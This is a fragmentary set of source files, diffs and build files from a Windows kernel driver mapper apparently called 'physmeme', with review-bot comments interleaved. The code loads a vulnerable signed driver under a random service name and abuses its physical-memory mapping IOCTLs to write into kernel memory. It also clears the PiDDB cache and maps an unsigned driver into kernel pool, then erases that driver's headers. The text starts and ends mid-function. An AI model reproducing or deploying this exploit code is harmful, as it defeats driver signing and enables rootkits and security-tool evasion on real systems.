|
||||
|
||||
//
|
||||
// set image path to the driver on disk
|
||||
//
|
||||
result = RegSetValueExA(
|
||||
reg_handle,
|
||||
"ImagePath",
|
||||
NULL,
|
||||
REG_SZ,
|
||||
(std::uint8_t*) drv_path.c_str(),
|
||||
drv_path.size()
|
||||
);
|
||||
|
||||
if (result != ERROR_SUCCESS)
|
||||
return false;
|
||||
|
||||
return ERROR_SUCCESS == RegCloseKey(reg_handle);
|
||||
}
|
||||
|
||||
// this function was coded by paracord: https://githacks.org/snippets/4#L94
|
||||
inline bool enable_privilege(const std::wstring& privilege_name)
|
||||
{
|
||||
HANDLE token_handle = nullptr;
|
||||
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token_handle))
|
||||
return false;
|
||||
|
||||
LUID luid{};
|
||||
if (!LookupPrivilegeValueW(nullptr, privilege_name.data(), &luid))
|
||||
return false;
|
||||
|
||||
TOKEN_PRIVILEGES token_state{};
|
||||
token_state.PrivilegeCount = 1;
|
||||
token_state.Privileges[0].Luid = luid;
|
||||
token_state.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
|
||||
if (!AdjustTokenPrivileges(token_handle, FALSE, &token_state, sizeof(TOKEN_PRIVILEGES), nullptr, nullptr))
|
||||
return false;
|
||||
|
||||
CloseHandle(token_handle);
|
||||
return true;
|
||||
}
|
||||
|
||||
inline std::string get_service_image_path(const std::string& service_name)
|
||||
{
|
||||
HKEY reg_handle;
|
||||
DWORD bytes_read;
|
||||
char image_path[0xFF];
|
||||
static const std::string reg_key("System\\CurrentControlSet\\Services\\");
|
||||
|
||||
auto result = RegOpenKeyA(
|
||||
HKEY_LOCAL_MACHINE,
|
||||
reg_key.c_str(),
|
||||
®_handle
|
||||
);
|
||||
|
||||
result = RegGetValueA(
|
||||
reg_handle,
|
||||
service_name.c_str(),
|
||||
"ImagePath",
|
||||
REG_SZ,
|
||||
NULL,
|
||||
image_path,
|
||||
&bytes_read
|
||||
);
|
||||
|
||||
RegCloseKey(reg_handle);
|
||||
return std::string(image_path);
|
||||
}
|
||||
}
|
||||
|
||||
inline bool load(const std::string& drv_path, const std::string& service_name)
|
||||
{
|
||||
if (!util::enable_privilege(L"SeLoadDriverPrivilege"))
|
||||
return false;
|
||||
|
||||
if (!util::create_service_entry("\\??\\" + std::filesystem::absolute(std::filesystem::path(drv_path)).string(), service_name))
|
||||
return false;
|
||||
|
||||
std::string reg_path("\\Registry\\Machine\\System\\CurrentControlSet\\Services\\");
|
||||
reg_path += service_name;
|
||||
|
||||
static const auto lp_nt_load_drv =
|
||||
::GetProcAddress(
|
||||
GetModuleHandleA("ntdll.dll"),
|
||||
"NtLoadDriver"
|
||||
);
|
||||
|
||||
if (lp_nt_load_drv)
|
||||
{
|
||||
ANSI_STRING driver_rep_path_cstr;
|
||||
UNICODE_STRING driver_reg_path_unicode;
|
||||
|
||||
RtlInitAnsiString(&driver_rep_path_cstr, reg_path.c_str());
|
||||
RtlAnsiStringToUnicodeString(&driver_reg_path_unicode, &driver_rep_path_cstr, true);
|
||||
return ERROR_SUCCESS == reinterpret_cast<nt_load_driver_t>(lp_nt_load_drv)(&driver_reg_path_unicode);
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
inline std::tuple<bool, std::string> load(const std::vector<std::uint8_t>& drv_buffer)
|
||||
{
|
||||
static const auto random_file_name = [](std::size_t length) -> std::string
|
||||
{
|
||||
static const auto randchar = []() -> char
|
||||
{
|
||||
const char charset[] =
|
||||
"0123456789"
|
||||
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
"abcdefghijklmnopqrstuvwxyz";
|
||||
const std::size_t max_index = (sizeof(charset) - 1);
|
||||
return charset[rand() % max_index];
|
||||
};
|
||||
std::string str(length, 0);
|
||||
std::generate_n(str.begin(), length, randchar);
|
||||
return str;
|
||||
};
|
||||
|
||||
const auto service_name = random_file_name(16);
|
||||
const auto file_path = std::filesystem::temp_directory_path().string() + service_name;
|
||||
std::ofstream output_file(file_path.c_str(), std::ios::binary);
|
||||
|
||||
output_file.write((char*)drv_buffer.data(), drv_buffer.size());
|
||||
output_file.close();
|
||||
|
||||
return { load(file_path, service_name), service_name };
|
||||
}
|
||||
|
||||
inline std::tuple<bool, std::string> load(const std::uint8_t* buffer, const std::size_t size)
|
||||
{
|
||||
std::vector<std::uint8_t> image(buffer, buffer + size);
|
||||
return load(image);
|
||||
}
|
||||
|
||||
inline bool unload(const std::string& service_name)
|
||||
{
|
||||
std::string reg_path("\\Registry\\Machine\\System\\CurrentControlSet\\Services\\");
|
||||
reg_path += service_name;
|
||||
|
||||
static const auto lp_nt_unload_drv =
|
||||
::GetProcAddress(
|
||||
GetModuleHandleA("ntdll.dll"),
|
||||
"NtUnloadDriver"
|
||||
);
|
||||
|
||||
if (lp_nt_unload_drv)
|
||||
{
|
||||
ANSI_STRING driver_rep_path_cstr;
|
||||
UNICODE_STRING driver_reg_path_unicode;
|
||||
|
||||
RtlInitAnsiString(&driver_rep_path_cstr, reg_path.c_str());
|
||||
RtlAnsiStringToUnicodeString(&driver_reg_path_unicode, &driver_rep_path_cstr, true);
|
||||
|
||||
const bool unload_drv = !reinterpret_cast<nt_unload_driver_t>(lp_nt_unload_drv)(&driver_reg_path_unicode);
|
||||
const auto image_path = std::filesystem::temp_directory_path().string() + service_name;
|
||||
const bool delete_reg = util::delete_service_entry(service_name);
|
||||
|
||||
try
|
||||
{
|
||||
const bool delete_drv = std::filesystem::remove(image_path);
|
||||
}catch (std::exception& e) {}
|
||||
return unload_drv && delete_reg;
|
||||
}
|
||||
return false;
|
||||
}
|
||||
}
|
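--- a/map_driver.cpp
+++ b/map_driver.cpp
@@ -0,0 +1,91 @@
+#include "kernel_ctx/kernel_ctx.h"
+#include "drv_image/drv_image.h"
+
+namespace physmeme
+{
+NTSTATUS __cdecl map_driver(std::vector<std::uint8_t>& raw_driver)
+{
+physmeme::drv_image image(raw_driver);
+
+//
+// load exploitable driver
+//
+if (!physmeme::load_drv())
+return STATUS_ABANDONED;
+
+physmeme::kernel_ctx ctx;
+
+//
+// shoot the tires off piddb cache.
+//
+const auto drv_timestamp = util::get_file_header(raw_driver.data())->TimeDateStamp;
+if (!ctx.clear_piddb_cache(physmeme::drv_key, drv_timestamp))
+return STATUS_ABANDONED;
+
+//
+// lambdas used for fixing driver image
+//
+const auto _get_module = [&](std::string_view name)
+{
+return util::get_module_base(name.data());
+};
+
+const auto _get_export_name = [&](const char* base, const char* name)
+{
+return reinterpret_cast<std::uintptr_t>(util::get_kernel_export(base, name));
+};
+
+//
+// fix the driver image
+//
+image.fix_imports(_get_module, _get_export_name);
+image.map();
+
+//
+// allocate memory in the kernel for the driver
+//
+const auto pool_base =
+ctx.allocate_pool(
+image.size(),
+NonPagedPool
+);
+
+image.relocate(pool_base);
+
+//
+// copy driver into the kernel
+//
+ctx.write_kernel(pool_base, image.data(), image.size());
+
+//
+// driver entry
+//
+auto entry_point = reinterpret_cast<std::uintptr_t>(pool_base) + image.entry_point();
+
+//
+// call driver entry
+//
+auto result = ctx.syscall<DRIVER_INITIALIZE>(
+reinterpret_cast<void*>(entry_point),
+reinterpret_cast<std::uintptr_t>(pool_base),
+image.size()
+);
+
+//
+// zero driver headers
+//
+ctx.zero_kernel_memory(pool_base, image.header_size());
+
+physmeme::unmap_all();
+if (!physmeme::unload_drv())
+return STATUS_ABANDONED;
+
+return result;
+}
+
+NTSTATUS __cdecl map_driver(std::uint8_t * image, std::size_t size)
+{
+std::vector<std::uint8_t> data(image, image + size);
+return map_driver(data);
+}
+}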
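Review bot: Once `physmeme::load_drv()` has succeeded, every later failure path in map_driver leaves the exploitable driver loaded: the `clear_piddb_cache` failure returns `STATUS_ABANDONED` without calling `physmeme::unload_drv()`, and the `ctx.allocate_pool` result is never checked for null before `image.relocate`, `ctx.write_kernel` and the `DRIVER_INITIALIZE` call run against it. For a tool whose premise is a vulnerable signed driver, leaving that driver resident on an error path is the worst outcome, so every exit after `load_drv()` should unload (and `unmap_all()` once mappings exist). The mapped driver's entry also receives `pool_base` and `image.size()` where `DriverObject` and `RegistryPath` are expected, and the final `unload_drv()` failure discards `result`; both deserve a comment so the contract is explicit, e.g. `// DriverObject/RegistryPath are not real objects; the mapped driver must not dereference them`. `util::get_file_header(raw_driver.data())` parses a caller-supplied buffer with no size or signature check visible in this hunk; presumably drv_image validates the headers, but that cannot be confirmed here.
```cpp
if (!physmeme::load_drv())
    return STATUS_ABANDONED;
// … unchanged: kernel_ctx construction, timestamp lookup …
if (!ctx.clear_piddb_cache(physmeme::drv_key, drv_timestamp))
{
    physmeme::unload_drv();   // never leave the vulnerable driver resident
    return STATUS_ABANDONED;
}
// … unchanged: import fixing, image.map() …
const auto pool_base = ctx.allocate_pool(image.size(), NonPagedPool);
if (!pool_base)
{
    physmeme::unmap_all();
    physmeme::unload_drv();
    return STATUS_ABANDONED;
}
// … unchanged: relocate, write_kernel, entry call, header zeroing, unload …
```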
|
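--- a/map_driver.hpp
+++ b/map_driver.hpp
@@ -0,0 +1,9 @@
+#pragma once
+#include <vector>
+#include <Windows.h>
+
+namespace physmeme
+{
+NTSTATUS __cdecl map_driver(std::vector<std::uint8_t>& raw_driver);
+NTSTATUS __cdecl map_driver(std::uint8_t * image, std::size_t size);
+}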
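Review bot: `NTSTATUS` is used in both declarations but the header only includes `<Windows.h>`, which does not define it on its own; this compiles only when an earlier include in the translation unit pulls in `winternl.h` or `ntdef.h`, so the header should carry `#include <winternl.h>` itself (and `<cstdint>`/`<cstddef>` for `std::uint8_t`/`std::size_t`, which are currently reached only transitively through `<vector>`). The vector overload takes `std::vector<std::uint8_t>&`, yet map_driver.cpp appears to read the buffer only via `.data()` and by handing it to drv_image's constructor, so `const std::vector<std::uint8_t>&` would document that the caller's driver image is not modified.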
|
@ -0,0 +1,178 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<ProjectGuid>{13FFA531-AD46-46F8-B52D-4A01BA078034}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>physmeme</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<WarningLevel>TurnOffAllWarnings</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp17</LanguageStandard>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<WarningLevel>TurnOffAllWarnings</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp17</LanguageStandard>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<WarningLevel>TurnOffAllWarnings</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp17</LanguageStandard>
|
||||
<Optimization>Disabled</Optimization>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<WarningLevel>TurnOffAllWarnings</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp17</LanguageStandard>
|
||||
<Optimization>Disabled</Optimization>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="drv_image\drv_image.cpp" />
|
||||
<ClCompile Include="kernel_ctx\kernel_ctx.cpp" />
|
||||
<ClCompile Include="map_driver.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="drv_image\drv_image.h" />
|
||||
<ClInclude Include="kernel_ctx\kernel_ctx.h" />
|
||||
<ClInclude Include="loadup.hpp" />
|
||||
<ClInclude Include="map_driver.hpp" />
|
||||
<ClInclude Include="physmeme\physmeme.hpp" />
|
||||
<ClInclude Include="raw_driver.hpp" />
|
||||
<ClInclude Include="util\hook.hpp" />
|
||||
<ClInclude Include="util\nt.hpp" />
|
||||
<ClInclude Include="util\util.hpp" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
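Review bot: All four configurations set `<WarningLevel>TurnOffAllWarnings</WarningLevel>`, and both Release configurations combine `<WholeProgramOptimization>true</WholeProgramOptimization>` with `<Optimization>Disabled</Optimization>`. For code that computes kernel addresses and writes into kernel memory, silenced warnings hide exactly the truncation, sign-conversion and unused-result issues a reviewer depends on, so `<WarningLevel>Level3</WarningLevel>` (ideally `Level4`) is the minimum. The disabled Release optimization looks like a debugging leftover; `<Optimization>MaxSpeed</Optimization>` or dropping the element restores a normal Release build. `<SpectreMitigation>false</SpectreMitigation>` is explicit and likely intentional for a user-mode tool, but a one-line comment stating why would stop it being "fixed" later.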
|
@ -0,0 +1,71 @@
|
||||
๏ปฟ<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files\kernel_ctx">
|
||||
<UniqueIdentifier>{040c8387-476c-4aa5-aa2a-ca30465b41bd}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\kernel_ctx">
|
||||
<UniqueIdentifier>{642c89a0-7989-4f5c-ae5a-f71e697abe16}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Header Files\physmeme">
|
||||
<UniqueIdentifier>{c4aa2f98-70d4-418e-894d-4e1975e2bad2}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Header Files\util">
|
||||
<UniqueIdentifier>{4fd2f117-66bb-4f75-af5b-b7e041a4dc48}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Header Files\drv_image">
|
||||
<UniqueIdentifier>{161b3714-a6cd-4b7b-a1f1-9b90b1f84aca}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\drv_image">
|
||||
<UniqueIdentifier>{ed9d2db3-acef-42c0-880f-7f95dcca819d}</UniqueIdentifier>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="kernel_ctx\kernel_ctx.cpp">
|
||||
<Filter>Source Files\kernel_ctx</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="drv_image\drv_image.cpp">
|
||||
<Filter>Source Files\drv_image</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="map_driver.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="kernel_ctx\kernel_ctx.h">
|
||||
<Filter>Header Files\kernel_ctx</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="util\hook.hpp">
|
||||
<Filter>Header Files\util</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="util\util.hpp">
|
||||
<Filter>Header Files\util</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="util\nt.hpp">
|
||||
<Filter>Header Files\util</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="drv_image\drv_image.h">
|
||||
<Filter>Header Files\drv_image</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="physmeme\physmeme.hpp">
|
||||
<Filter>Header Files\physmeme</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="map_driver.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="loadup.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="raw_driver.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
</Project>
|
@ -0,0 +1,19 @@
|
||||
๏ปฟ<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LocalDebuggerCommandArguments>C:\Users\interesting\Desktop\hello-world.sys</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LocalDebuggerCommandArguments>C:\Users\interesting\Desktop\hello-world.sys</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LocalDebuggerCommandArguments>C:\Users\interesting\Desktop\hello-world.sys</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LocalDebuggerCommandArguments>C:\Users\interesting\Desktop\hello-world.sys</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
</Project>
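Review bot: This `.vcxproj.user` file is per-developer IDE state and should not be committed; it hardcodes `C:\Users\interesting\Desktop\hello-world.sys` as the debugger argument in all four configurations, which leaks a local Windows username and points at a path that exists on no other machine. Delete the file from the tree and add `*.vcxproj.user` to `.gitignore`; anyone who needs a test driver path can set it locally in Visual Studio.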
|
@ -0,0 +1,112 @@
|
||||
#pragma once
|
||||
#include <windows.h>
|
||||
#include <mutex>
|
||||
#include <cstdint>
|
||||
#include <map>
|
||||
|
||||
#include "../util/util.hpp"
|
||||
#include "../loadup.hpp"
|
||||
#include "../raw_driver.hpp"
|
||||
|
||||
#pragma pack ( push, 1 )
|
||||
typedef struct _GIOMAP
|
||||
{
|
||||
unsigned long interface_type;
|
||||
unsigned long bus;
|
||||
std::uintptr_t physical_address;
|
||||
unsigned long io_space;
|
||||
unsigned long size;
|
||||
} GIOMAP;
|
||||
#pragma pack ( pop )
|
||||
|
||||
#define MAP_PHYS 0xC3502004
|
||||
#define UNMAP_PHYS 0xC3502008
|
||||
|
||||
namespace physmeme
|
||||
{
|
||||
inline std::string drv_key;
|
||||
inline HANDLE drv_handle = NULL;
|
||||
|
||||
// keep track of mappings.
|
||||
inline std::vector<std::pair<std::uintptr_t, std::uint32_t >> virtual_mappings;
|
||||
|
||||
//
|
||||
// please code this function depending on your method of physical read/write.
|
||||
//
|
||||
inline bool load_drv()
|
||||
{
|
||||
const auto [result, key] =
|
||||
driver::load(
|
||||
raw_driver,
|
||||
sizeof(raw_driver)
|
||||
);
|
||||
|
||||
drv_key = key;
|
||||
drv_handle = CreateFile(
|
||||
"\\\\.\\GIO",
|
||||
GENERIC_READ | GENERIC_WRITE,
|
||||
NULL,
|
||||
NULL,
|
||||
OPEN_EXISTING,
|
||||
FILE_ATTRIBUTE_NORMAL,
|
||||
NULL
|
||||
);
|
||||
return drv_handle;
|
||||
}
|
||||
|
||||
//
|
||||
// please code this function depending on your method of physical read/write.
|
||||
//
|
||||
inline bool unload_drv()
|
||||
{
|
||||
return CloseHandle(drv_handle) && driver::unload(drv_key);
|
||||
}
|
||||
|
||||
//
|
||||
// please code this function depending on your method of physical read/write.
|
||||
//
|
||||
inline std::uintptr_t map_phys(
|
||||
std::uintptr_t addr,
|
||||
std::size_t size
|
||||
)
|
||||
{
|
||||
//--- ensure the validity of the address we are going to try and map
|
||||
if (!util::is_valid(addr))
|
||||
return NULL;
|
||||
|
||||
GIOMAP in_buffer = { 0, 0, addr, 0, size };
|
||||
uintptr_t out_buffer[2] = { 0 };
|
||||
unsigned long returned = 0;
|
||||
DeviceIoControl(drv_handle, MAP_PHYS, reinterpret_cast<LPVOID>(&in_buffer), sizeof(in_buffer),
|
||||
reinterpret_cast<LPVOID>(out_buffer), sizeof(out_buffer), &returned, NULL);
|
||||
|
||||
virtual_mappings.emplace_back(std::pair<std::uintptr_t, std::size_t>(out_buffer[0], size));
|
||||
return out_buffer[0];
|
||||
}
|
||||
|
||||
//
|
||||
// please code this function depending on your method of physical read/write.
|
||||
//
|
||||
inline bool unmap_phys(
|
||||
std::uintptr_t addr,
|
||||
std::size_t size
|
||||
)
|
||||
{
|
||||